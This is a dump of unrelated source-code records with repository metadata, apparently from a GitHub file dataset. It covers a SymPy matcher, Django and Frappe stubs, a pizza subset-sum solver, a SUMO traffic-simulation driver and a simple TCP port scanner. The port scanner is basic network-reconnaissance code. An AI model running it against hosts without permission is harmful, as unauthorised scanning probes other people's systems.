# x = embID(x)
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
| [
"nanigashi03@gmail.com"
] | nanigashi03@gmail.com |
e98c9e6e4e8e98f0eb86148a6604600fbb0f969e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part002645.py | 26c00d84fbe342c060edabef02fe3c69582a4427 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher122210(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.2.1.2.1.0_1', 1, 1, S(1)), Mul)
]),
1: (1, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher122210._instance is None:
CommutativeMatcher122210._instance = CommutativeMatcher122210()
return CommutativeMatcher122210._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 122209
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 123779
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.2.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 123780
if len(subjects2) >= 1:
tmp5 = subjects2.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.1.2.1.2', tmp5)
except ValueError:
pass
else:
pass
# State 123781
if len(subjects2) == 0:
pass
# State 123782
if len(subjects) == 0:
pass
# 0: x**n
yield 0, subst2
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
18993d6a9980af00334c5b5db42135f52700e93a | 925f9291b8d98468f17ff8b8e5d54006193ddcd0 | /bookstore/urls.py | 36c6e936740001e428aba08ea0fa667cda50af5b | [] | no_license | hamzabelatra/DjangoBookStore | 7c058469acef22228463580f6c343cb591e626eb | 5cbffd37bd093a497d18c131b532256cee19b2d9 | refs/heads/master | 2023-08-09T11:10:11.895251 | 2021-09-20T20:18:50 | 2021-09-20T20:18:50 | 408,589,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """bookstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"hamzabelatra1@gmail.com"
] | hamzabelatra1@gmail.com |
ab8659e73eca39e44cbcc460da6ce495f4024307 | 1b8ffe50059dff352206da41d40a6cab12744864 | /PortScanner.py | cc6cd65670f145625b93d510c0c9d7f1efcc60bc | [] | no_license | XD-Coffin/PortScanner | f4bca444a98115aee5eaa6e11e7b77f23a069ab7 | 299e3947ee0fc84c3af80370498fe357f1aabe60 | refs/heads/master | 2022-12-20T08:58:47.745548 | 2020-10-20T00:41:31 | 2020-10-20T00:41:31 | 305,545,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | import socket
import sys
import os
import time
os.system("color a")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host = input("Enter the host's ip address you want to scan: ")
print("""
1. Specific Port
2. All 1000 Ports
""")
option = int(input("Enter the option you want to use: "))
if option == 1:
port = int(input("Enter the port: "))
if s.connect_ex((host,port)):
print(f"Port {port} is closed")
else:
print(f"{port} Port is open")
elif option == 2:
for port in range(1000):
if s.connect_ex((host,port)):
print(f'Port {port} is closed')
else:
print(f"{port} Port is open")
port+=1
# print("Coded by Sahil Singh.")
time.sleep(6)
sys.exit()
| [
"np01nt4a190175@islingtoncollege.edu.np"
] | np01nt4a190175@islingtoncollege.edu.np |
f6c9eb2dd9064e19a427efac7876905fb88841f9 | 9093f2a305bba661ae671134648a251612226c83 | /manage.py | aaa2b9aa399e90031f7f7112abf86277daa20ef1 | [] | no_license | Regaron/ECommerce | 7b631290f0d709f0d9c52663f705ee0db9e6564e | 55c70e4a9a24192f80906f1d6893fc3dc96e2355 | refs/heads/master | 2020-03-25T04:35:31.878809 | 2019-11-16T14:07:53 | 2019-11-16T14:07:53 | 141,599,613 | 0 | 0 | null | 2018-07-26T04:35:43 | 2018-07-19T15:38:22 | Python | UTF-8 | Python | false | false | 541 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ECommerce.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"sujanbudhathoki123@gmail.com"
] | sujanbudhathoki123@gmail.com |
7d1d73ca2a8cb31e859f930a208e08029fffaba2 | 650e8c0eef602308e61a6d3c9476bb550c3e4a8c | /StartingOutWithPy/Chapter 02/ProgrammingExercises/09_C_to_F_temp_converter.py | af802349730447421820e6c8bf6b9b99b15d352f | [] | no_license | cosmos512/PyDevoir | 7895d21d70c94074cacab79ca55dc1fca00bd514 | 3eabad164a62c7ef7919e7847033e67e7b0644a3 | refs/heads/master | 2021-01-23T18:59:21.136075 | 2014-08-03T20:10:25 | 2014-08-03T20:10:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Write a program that converts Celsius temperatures to Fahrenheit temperatures.
# The formula is as follows:
# 9
# F = - C + 32
# 5
# The program should ask the user to enter a temperature in Celsius, and then
# display the temperature converted to Fahrenheit.
C = float(input('What is the Celsius temperature you saw?: '))
F = 9 / 5 * C + 32
print("Well, then that means it's", format(F, '.1f'), "degrees Fahrenheit.")
| [
"lunlunart@gmail.com"
] | lunlunart@gmail.com |
25859d62514ea506faa2e5384810904d8205659b | 78560437a0cc6c1e34ab654c32f5fab465530aeb | /EstruturaSequencial/16_Casa_tintas.py | 33770d4450d1d1c267287eb062f08bf53000ce0c | [] | no_license | StefanOliveira/ExerciciosPython | bec15ab3fb0c10aebde1e2d8e5992fd9b77bb2c8 | f7b51276e2e2ed7bb4160615b49a5df24c50e248 | refs/heads/master | 2020-03-20T14:26:51.306691 | 2018-08-20T19:33:16 | 2018-08-20T19:33:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | nQtdMts = float(input('Informe a area em metros que será pintada: '))
nLitros = nQtdMts / 3.0
nLatas = int(nLitros / 18.0)
if (nLitros % 18 != 0):
nLatas += 1
print ('Você precisa de',nLatas,'latas de tinta')
print ('Total a pagar:',nLatas * 80)
| [
"noreply@github.com"
] | noreply@github.com |
bbf45532ab46317e7c548a735d5a2663e074b126 | e9263f1f1a780e831464626ffcc74a9eeb2b2f12 | /print_request.py | 6ea534ce1cc3bef70a40a813e279197625d05893 | [] | no_license | OPEOStudio/kraft_bootstrap | bd26bb9bdd187961b36a2a1753f325fe45515a06 | e5e0e07694cd792aa82107832714d3a90696e6ac | refs/heads/master | 2020-04-06T18:57:23.106134 | 2019-01-16T10:05:12 | 2019-01-16T10:05:12 | 157,719,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import requests
import json
### PRINT THE REQUEST
# Script to print the request, to make sure that all the right request elements are being sent
# DOESN'T WORK FOR NOW
def print_r(string, url, data, headers, params):
# Put headers, params back into dictionnary
#print("headers: "+headers) ## Allowed me to test that headers is well a dict right now
#headers_dict = json.loads(headers)
#params_dict = json.loads(params)
print("headers : "+str(headers))
# Define the Request object
request = requests.Request(string, url, data = data, headers = headers, params = params)
print("request: "+str(request))
# Prepare the request
prepared = request.prepare()
# Calls the printing step
pretty_print_POST(prepared)
def pretty_print_POST(request):
"""
At this point it is completely built and ready
to be fired; it is "prepared".
However pay attention at the formatting used in
this function because it is programmed to be pretty
printed and may differ from the actual request.
"""
print(" ")
print('{}\n{}\n{}\n\n{}'.format(
'-----------START-----------',
request.method + ' ' + request.url,
'\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items()),
request.body,
))
| [
"36651512+musiquarc@users.noreply.github.com"
] | 36651512+musiquarc@users.noreply.github.com |
e74628558b410dabd6460047e5def4308c79a579 | d153be2b35d7274bfadc305af19ee5f6827efb07 | /captain_console/cart/migrations/0004_auto_20200514_2204.py | 3ecf0942392a7f84050e3aac1fef658200e62178 | [] | no_license | bjorgvin16/verklegt2 | 1796ee6b4e8e4a6ab8fe5f1776109d56e4777d05 | f833243c5f48e54817fe105f33ce216ec66c3c6c | refs/heads/master | 2022-07-26T03:04:14.805467 | 2020-05-15T23:08:53 | 2020-05-15T23:08:53 | 259,272,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # Generated by Django 3.0.6 on 2020-05-14 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cart', '0003_order_orderdate'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='quantity',
),
migrations.AddField(
model_name='cart',
name='quantity',
field=models.IntegerField(default=1),
),
]
| [
"margriette123@gmail.com"
] | margriette123@gmail.com |
a49e2c4eeddaf540dfd5ba698a9805c8b952a483 | c9f3ecbf78f890ff598591e6bf326b79f7b22608 | /Python/Chapter 1/ex32.py | 84d63a023dcbb5ab1aa4d9b366425ad84de0ea83 | [] | no_license | bomcon123456/DSA_Learning | f17ceacadaf0398e233c9740d9d24ee5fc76fa69 | d943ec1aa7315d0e34fd3505ccb5a62a415ecf73 | refs/heads/master | 2020-06-25T08:58:50.280816 | 2020-01-02T02:36:17 | 2020-01-02T02:36:17 | 199,265,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | def ex32():
c = ""
res = 0
plusNext = False
while True:
c = input()
arr = c.split(" ")
if len(arr) == 1:
if c == "+":
res = res
plusNext = True
elif c == "=":
print(res)
return res
else:
if plusNext:
res += float(c)
else:
res = res * 10 + float(c)
else:
raise IOError("Unsupported operations")
ex32()
| [
"termanteus@aos-iMac.local"
] | termanteus@aos-iMac.local |
a160ac123f2a744d1d10d17cfc24c6bec46d13dd | a5bd2739e15716de801d621e6a756c943cb937e4 | /states/base/_grains/reboot_required.py | f8aa8cad002ccccebb1d1d44b3ecc72277a3fcf3 | [] | no_license | ashmckenzie/salt | 00be6ec559769c7aff84f3ed97eb2162ee6bfcc4 | dc67b06e99ad61f203752867ce54dc31a48b9800 | refs/heads/master | 2020-12-23T11:16:58.096353 | 2017-06-21T00:28:26 | 2017-06-21T00:28:26 | 33,473,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | # -*- coding: utf-8 -*-
import os.path
def reboot_required():
grains = {}
grains['reboot_required'] = os.path.isfile('/var/run/reboot-required')
return grains
| [
"ash@the-rebellion.net"
] | ash@the-rebellion.net |
4f0d5c22413bdaacf869bf9cbd12d47bcc73f375 | 1dc753d68b234b10193962f58d306bd91957eb6d | /college/college/doctype/student_achievements/student_achievements.py | 66884338ed30206d53469c0ed0ba413e759ab9c7 | [
"MIT"
] | permissive | harshith187/college | e8612134e47c48ad721840f684362f7348e9bad4 | d9ae21734dcde70397aead827e57fbbdcdeb98c9 | refs/heads/master | 2020-07-20T12:36:27.601134 | 2020-05-25T13:53:57 | 2020-05-25T13:53:57 | 206,641,495 | 0 | 4 | NOASSERTION | 2020-05-25T15:05:16 | 2019-09-05T19:27:37 | Python | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, mvit ise and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class StudentAchievements(Document):
pass
| [
"frappe@ubuntu.vm"
] | frappe@ubuntu.vm |
1253ef78db264c7b83bead8bbc79f13fb57fd0b9 | 2bdf073b9788c446342643296c6b68c353b0a5c6 | /rareapi/views/tag.py | eab977834ef18b2af0bd99de48da0dfffcf18616 | [] | no_license | nss-day-cohort-50/rare-api-rowdy-roadtrippers | f07819362a97b0b02d945c9e932ecf18375c01ea | 25122375b4f07b738a65c4bac21ff300379d831b | refs/heads/main | 2023-09-03T12:57:04.390337 | 2021-11-18T17:34:05 | 2021-11-18T17:34:05 | 428,313,351 | 0 | 0 | null | 2021-11-18T17:34:06 | 2021-11-15T15:14:38 | Python | UTF-8 | Python | false | false | 1,501 | py | from django.core.exceptions import ValidationError
from rest_framework import status
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rareapi.models import Tag
class TagView(ViewSet):
def create(self, request):
try:
tag = Tag.objects.create(
label = request.data["label"]
)
serializer = TagSerializer(tag, context={"request": request})
return Response(serializer.data)
except ValidationError as ex:
return Response({"reason": ex.message}, status=status.HTTP_400_BAD_REQUEST)
def list(self, request):
tag = Tag.objects.all()
serializer = TagSerializer(
tag, many=True, context={'request': request})
return Response(serializer.data)
def destroy(self, request, pk=None):
try:
tag = Tag.objects.get(pk=pk)
tag.delete()
return Response({}, status=status.HTTP_204_NO_CONTENT)
except tag.DoesNotExist as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
except Exception as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('id', 'label')
depth = 1
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
7725728c4396eab46cc3164cd5889e7d901b4a5f | 5a760a0ff2a1655e3fbddd621a181378ea092fcc | /StarWebBuilder/timeout.py | 0586ada83fff4c9164333ee84c45b29f1a458022 | [
"MIT"
] | permissive | taschetto/sublimeSettings | 7f8292737b6f413718d7e076b9bd08e0ef8a297d | 64bcb568c240b851efc914b102e0c57e1553d8c5 | refs/heads/master | 2020-03-26T05:45:59.888806 | 2016-09-14T15:34:11 | 2016-09-14T15:35:07 | 26,015,128 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | from functools import wraps
import errno
import os
import signal
class TimeoutError(Exception):
pass
def timeout(seconds=10, error_message=os.strerror(errno.ETIME)):
def decorator(func):
def _handle_timeout(signum, frame):
raise TimeoutError(error_message)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
return decorator | [
"gtaschetto@gmail.com"
] | gtaschetto@gmail.com |
f346c7f538f075ee8c1577c89e089a80c6232447 | 571322962890d461a6b142b42f6ed66be23fb299 | /blog/admin.py | a6493140ae0a0212665647a59d6e8f86f532b104 | [] | no_license | Cyapy/my-first-blog | e94b1e012b2760506a091f9d32018d31fbd237a8 | ec94ef330634377a2f6844de5989ad0cb594c970 | refs/heads/master | 2020-07-23T10:58:54.566605 | 2019-09-10T10:59:43 | 2019-09-10T10:59:43 | 207,536,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.contrib import admin
#from .models import Company
from .models import Post
#admin.site.register(Company)
admin.site.register(Post)
| [
"cz.arnold1977@gmail.com"
] | cz.arnold1977@gmail.com |
fcaa9a254056832dd56dc34f39f25cba73e8989e | b04d95eb1d2769945b9d93f223d93815796206f7 | /simulation/execution/startSimulation.py | 7e9fc845db74aaca641f7c3fff0bad9605023008 | [] | no_license | DrRoad/Traffic-Simulation-in-SUMO-and-statistics-generator | 19cbca58f55b3ac64ed598641d3c69afa3edbe52 | c37627c5f32afbac904657d092d149db62cc9148 | refs/heads/master | 2022-01-09T03:06:44.135211 | 2019-07-23T19:52:43 | 2019-07-23T19:52:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,196 | py | import os
import sys
import argparse
import uuid
import datetime
import requests
from lxml import etree
import input_preprocessing as ip
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
# tripInfo = "../data/input-statistics/tripinfo.xml"
# edgeLane = "../data/input-statistics/edgelane.xml"
simulation_id = ""
scenario_id = ""
scenario_description = ""
# contains TraCI control loop
def run():
# step = 0
while traci.simulation.getMinExpectedNumber() > 0:
traci.simulationStep()
# print(step)
# step += 1
traci.close()
sys.stdout.flush()
def create_simulation_id():
global simulation_id
# simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-") + str(uuid.uuid4())
simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
simulation_id = "2054-07-19-19-35-29"
def get_scenario_id(filepath):
tree = etree.parse(filepath)
root = tree.getroot()
global scenario_id
global scenario_description
for elem in root.iter('scenario'):
scenario_id = elem.attrib['id']
if scenario_id == '1':
scenario_description = "morning rush hour"
elif scenario_id == '2':
scenario_description = "noon"
else:
scenario_description = "afternoon rush hour"
def add_id_to_tripinfo(filepath):
path = filepath + "tripinfo.xml"
tree = etree.parse(path)
root = tree.getroot()
for elem in root.iter('tripinfos'):
elem.set('id', simulation_id)
elem.set('scenario_id', scenario_id)
elem.set('scenario_description', scenario_description)
tree.write(path)
print('The statistics id was added', simulation_id)
def add_scenario_to_edge_file(filepath, type_of_file='edgelane'):
if type_of_file == 'edge':
path = filepath + "edge.xml"
else:
path = filepath + "edgelane.xml"
tree = etree.parse(path)
root = tree.getroot()
for elem in root.iter('meandata'):
elem.set('scenario_id', scenario_id)
elem.set('scenario_description', scenario_description)
tree.write(path)
print('The scenario id and description are added' + " to " + type_of_file, scenario_id + ' and' + scenario_description)
def create_xml_file(filepath, freq, sim_id):
path = filepath + "additional.xml"
# print(path)
with open(path, 'w') as fb:
fb.write('<additional>')
lane = "<laneData "
id = "id=" + "\"" + sim_id + "\" "
file = "file=" + "\"" + "edgelane.xml" + "\" "
frequency = "freq=\"" + str(freq) + "\"" + "/>"
element = lane + id + file + frequency
edge = "<edgeData "
id = "id=" + "\"" + sim_id + "\" "
file = "file=" + "\"" + "edge.xml" + "\" "
frequency2 = "/>"
element = element + edge + id + file + frequency2
fb.write(element)
fb.write('</additional>')
return path
def Main():
create_simulation_id()
parser = argparse.ArgumentParser()
parser.add_argument('--config', default="../data/input-simulation/scenario2.sumocfg", type=str, help='Give the path to the sumocfg file')
# parser.add_argument('--additional', default="../data/input-statistics/additional.xml", type=str, help = 'Give the path to the additional file for tripinfo output')
parser.add_argument('--lanepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--edgepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--trippath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the tripinfo to be saved.')
parser.add_argument('--color', default="origin", type=str,
help='Type whether you want cars to be colored based on origin (default) or destination.')
parser.add_argument('--freq', default=600, type=int)
args = parser.parse_args()
success = ip.set_origin_dest_veh_color(args.color)
sumoBinary = "sumo-gui"
get_scenario_id(args.config)
print(scenario_id, scenario_description)
# # traci starts sumo as a subprocess and then this script connects and runs
sumoCMD = [sumoBinary, "-c", args.config,
"--additional-files", create_xml_file(args.lanepath, args.freq, simulation_id), "--tripinfo-output",
args.trippath + 'tripinfo.xml']
print(sumoCMD)
traci.start(sumoCMD)
run()
add_id_to_tripinfo(args.trippath)
add_scenario_to_edge_file(args.edgepath, 'edge')
add_scenario_to_edge_file(args.edgepath)
# # make post request
# # Set the name of the XML file.
#
# trips_xml = "../data/output-simulation/" + "tripinfo.xml"
# url_trips = "http://ios19kirch.ase.in.tum.de/api/simulation/input/trip"
#
# edge_lane_xml = "../data/output-simulation/" + "edgelane.xml"
# url_edge_lane = "http://ios19kirch.ase.in.tum.de/api/simulation/input/flow"
#
# edges_xml = "../data/output-simulation/" + "edge.xml"
# url_edges = "http://ios19kirch.ase.in.tum.de/api/simulation/input/mainroads"
#
# headers = {
# 'Content-Type': 'text/xml'
# }
#
# with open(trips_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_trips, data=the_data)
# print(r.content)
#
# with open(edge_lane_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edge_lane, data=the_data)
# print(r.content)
#
# with open(edges_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edges, data=the_data)
# print(r.content)
if __name__ == "__main__":
Main() | [
"ge36voj@mytum.de"
] | ge36voj@mytum.de |
955a3394f44e953f1a4c30c5c454af78e16f84da | a2477654a0fb85f9507389ff7a4b4a8bcc1641fa | /trydjango1-11/src/restaurants/migrations/0003_auto_20170926_1624.py | 5708b2f804f86a92b2d7213e1dbc4f79de3a24b5 | [] | no_license | ervinpepic/Django-11-Restaurant-app | 6ae1e2dec7571b0180ea991ca80b9b83d00cdb1b | a6bd976130c70621e6149ee64c61e1cdcec2acba | refs/heads/master | 2022-10-18T08:34:11.496044 | 2017-11-25T19:57:36 | 2017-11-25T19:57:36 | 111,400,182 | 0 | 1 | null | 2022-10-10T08:12:45 | 2017-11-20T11:13:00 | Python | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-09-26 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('restaurants', '0002_restaurant_location'),
]
operations = [
migrations.RenameModel(
old_name='Restaurant',
new_name='RestaurantLocation',
),
]
| [
"ervin.hack@gmail.com"
] | ervin.hack@gmail.com |
c36efc1843c3021c334a94bbf23e9898a24991eb | d0235e8259db910f577f418c644f2861b10df3ab | /rectangle_teddybear.pyde | 4c1bd4dd6e664665136a64109ccded12a53fd6b7 | [] | no_license | Ganesh2608/CG | 6b865f35da6f11066defb0bc9cbcef067098ca16 | aa926e54d0089cf22c110f13a01d7313129fc705 | refs/heads/master | 2020-03-27T13:19:45.141485 | 2018-11-12T06:33:12 | 2018-11-12T06:33:12 | 146,603,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | pyde | def setup():
#global viewport;
size(700,800);
#viewport = createGraphics();
def draw():
fill(255);
rect(200,120,95,70); #head
rect(225,190,45,160); #body line
rect(270,215,80,27); #hands
rect(145,215,80,27); #hands
rect(270,323,80,27); #legs
rect(145,323,80,27); #legs
rect(230,144,8,8); #eyes left
rect(259,144,8,8); #eyes right
rect(245,155,8,13); #nose
rect(235,173,28,7); #mouth
fill(200,0,0);
rect(239,175,20,5); #tongue
fill(0);
rect(232,146,4,4); #eyes left ball
rect(261,146,4,4); #eyes right ball
| [
"noreply@github.com"
] | noreply@github.com |
c1cc453fc746b6bc98f3d3c7890760918bc8317e | 5080f19c30738bff67e49eff7b91d3ba4315cd21 | /practice_pizza2020/test.py | ceb9be11a12ed3a579279bbd924093222874d8ef | [] | no_license | VincentZ-42/HashCode2020 | ad1edb71c20500f7ed0ab9b600e1fef926a839be | d30b3ae2549549dd133e134e3c3c77ecea0a5fb8 | refs/heads/master | 2021-01-07T12:59:54.862461 | 2020-02-20T22:57:09 | 2020-02-20T22:57:09 | 241,702,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # **************************************************************************** #
# #
# ::: :::::::: #
# test.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: vzhao <vzhao@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/02/19 11:56:47 by vzhao #+# #+# #
# Updated: 2020/02/19 20:59:48 by vzhao ### ########.fr #
# #
# **************************************************************************** #
import os
def subset_sum(file_path, file, OG, numbers, target, partial =[]):
"""
Function traverses through list of numbers to find the combination
that matches the target value (Function runs recursively)
Args:
(str) file_path = path to out the file
(file) file = the file id that we will write into
(list) OG = original set of numbers
(list) numbers = list of pizza types that is changed throughout recursion
(int) target = the total number of pizzas we want
(list) partial = list placeholder we use to hold the different types of pizzas
Returns:
Nothing...recursion stops once all combinations are found
"""
s = sum(partial)
if s == target:
file.write(str(len(partial)))
file.write("\n")
for j in range(len(partial)):
file.write(str(OG.index(partial[j])))
if j < len(partial) - 1:
file.write(" ")
file.write("\n")
if s >= target:
return
for i in range(len(numbers)):
file.close()
if os.path.getsize(file_path) != 0:
return
file = open(file_path, "w")
n = numbers[i]
remaining = numbers[i+1:]
subset_sum(file_path, file, OG, remaining, target, partial + [n])
a_in = open("a_example.in", "r") # This opens the text file and saves it into a variable
b_in = open("b_small.in", "r")
c_in = open("c_medium.in", "r")
d_in = open("d_quite_big.in", "r")
e_in = open("e_also_big.in", "r")
# -----------------------------Change this to get different outputs--------------------
# Reads the entire file and saves it into list
# Replace......
# a_in --> b_in (input from example b)
# a_out --> b_out (output of example b)
# "a_out" --> b_out (path name of newly created output file)
lines = c_in.readlines() # Change a_in to b_in
a_out = open("c_out", "w") # Change "a_out" to b_out
file_path = "c_out" # Change "a_out" to b_out
#---------------------------------------------------------------------------------------
slices, types = map(int, lines[0].split()) # Splits the first line into int variales
pizzas = map(int, lines[1].split()) # Splits the 2nd line into list of integers
# This checks if the file is empty or not
# Can also use os.stat(file_path).st_size == 0 as condition
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
while os.path.getsize(file_path) == 0:
a_out = open(file_path, "w")
subset_sum(file_path, a_out, pizzas, pizzas, slices)
slices -= 1
# a_out.close()
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
a_in.close()
b_in.close()
c_in.close()
d_in.close()
e_in.close()
| [
"vzhao@e1z1r4p3.42.us.org"
] | vzhao@e1z1r4p3.42.us.org |
7948a9e20dfc18adb728f35ea7d8d4a1387faf1a | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2408/60670/279400.py | 462432fde739ac9f0e437d3408deb95a44e663a4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | def isPrime(x):
for i in range(2,int(x**0.5)+1):
if x%i!=0:
return False
return True
def factorial(n):
t=1
for i in range(1,n):
t*=i
return t%1000000007
n=int(input())
numOfPrime=0
for i in range(1,n+1):
if isPrime(i):
numOfPrime+=1
print((factorial(numOfPrime)*factorial(n-numOfPrime))%1000000007) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
509e9d56682a9e7858514eff9ca4d13b748a8656 | 4ad9ae34e6d015ef865e93db71ac909531561ebe | /main.py | c65492feaa5b6e0797b04be2a760656191b624be | [] | no_license | chetanpujari5105/100DaysOfCodeInPython2021-Day-7 | 951e51cc420d5ea5dc2a6ee32e979e12ba466348 | 25055f6aa2030d27df0e721ced0a716404ccffa5 | refs/heads/main | 2023-02-13T21:45:10.933264 | 2021-01-10T18:18:43 | 2021-01-10T18:18:43 | 328,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | states_of_america = ["Delaware", "Pennsylvania", "New Jersey", "Georgia", "Connecticut", "Massachusetts", "Maryland", "South Carolina", "New Hampshire", "Virginia", "New York", "North Carolina", "Rhode Island", "Vermont", "Kentucky", "Tennessee", "Ohio", "Louisiana", "Indiana", "Mississippi", "Illinois", "Alabama", "Maine", "Missouri", "Arkansas", "Michigan", "Florida", "Texas", "Iowa", "Wisconsin", "California", "Minnesota", "Oregon", "Kansas", "West Virginia", "Nevada", "Nebraska", "Colorado", "North Dakota", "South Dakota", "Montana", "Washington", "Idaho", "Wyoming", "Utah", "Oklahoma", "New Mexico", "Arizona", "Alaska", "Hawaii"]
print(states_of_america)
print(states_of_america[1])
dirty_dozen = ["Strawberries", "Spinach", "Kale", "Nectarines", "Apples", "Grapes", "Peaches", "Cherries", "Pears", "Tomatoes", "Celery", "Potatoes"]
dirty_dozen.append("Banana")
print(dirty_dozen[-1])
| [
"noreply@github.com"
] | noreply@github.com |
